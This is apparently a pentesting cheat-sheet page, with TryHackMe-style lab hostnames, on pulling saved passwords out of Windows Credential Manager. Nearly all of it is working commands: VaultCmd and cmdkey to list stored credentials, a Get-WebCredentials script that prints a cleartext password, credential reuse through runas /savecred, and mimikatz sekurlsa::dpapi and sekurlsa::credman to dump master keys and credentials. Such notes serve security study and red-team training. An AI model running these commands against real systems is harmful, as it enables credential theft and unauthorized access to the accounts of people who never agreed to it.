Windows Credential Manager
Theory
Practice
# List vaults
C:\Users\Administrator> VaultCmd /list
# Extract and decrypt all master keys
sekurlsa::dpapi
# List property of a vault
C:\Users\Administrator> VaultCmd /listproperties:"Web Credentials"
# List creds in a vault
C:\Users\Administrator> VaultCmd /listcreds:"Web Credentials"
# List creds with cmdkey
C:\Users\Administrator> cmdkey /list# Get cleartext password
PS> Import-Module C:\Tools\Get-WebCredentials.ps1
PS> Get-WebCredentials
UserName Resource Password Properties
-------- -------- -------- ----------
THMUser internal-app.thm.red Password! {[hidden, False], [applicationid, 00000000-0000-0000-0000-000000000000], [application, MSEdge]}# Runas with saved credential for "THM.red\thm-local"
C:\Users\Administrator> runas /savecred /user:THM.red\thm-local cmd.exe
# We also can use mimikatz to dump creds
mimikatz# privilege::debug
Privilege '20' OK
mimikatz# sekurlsa::credmanResources
Last updated